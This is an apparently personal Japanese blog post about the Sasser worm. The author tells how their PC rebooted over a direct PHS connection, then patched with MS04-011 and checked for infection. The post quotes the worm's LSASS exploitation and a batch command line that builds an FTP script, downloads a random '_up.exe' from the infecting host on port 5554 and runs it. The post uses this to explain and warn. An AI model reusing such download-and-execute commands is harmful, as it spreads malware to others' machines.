W32.Sasser.worm

W32.Sasser.wormが猛威をふるっているらしい．
自分のPCでもそれらしい症状が発現（汗

@FreeDで繋ぐと，インターネット側直結になるので，LSASSをつつかれて，エラーが発生．
Windowsが致命的なシステム障害と認識して，リブートに入ってしまう．

ちなみに，こんな攻撃をしているらしい．
　LSASSの脆弱性を攻撃し、9996番ポートでシェルを実行。以下のコマンドを実行してランダム数字_up.exeというファイルを取得。avserve.exeとして%WINDIR% にインストール。レジストリに実行のキーを追加。5554ポートでFTPサーバとして動く。
echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo
anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.
exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.
exe&echo off&del cmd.ftp&echo on

なんか急にこんな症状でてきて，おっかしいなぁと思っていたところ，MSからのメールや巡回先のblogからwormのせいらしいと判明．
　http://www.microsoft.com/japan/security/incident/sasser.mspx

たまたま実家にいたので，速攻Windows UpdateでMS04-011を適用して，上記のサイトで感染しているかをチェック．
結果は，”感染なし”だったのでよかったけど，久々にちょっと焦ってしまった．
普段はルータ経由で使っているので，直で攻撃を受けることはなかったので，PHSで接続するときは注意が必要だ．
まぁ，@FreeD/64kでWindows Updateなんてかなりツライが…

あとは，WindowsXPのファイヤーウォール機能がどれだけのものか，早急にレビューが必要だなぁ．

@FreeD，AirHをお使いの同期のみなさん，要注意ですよ〜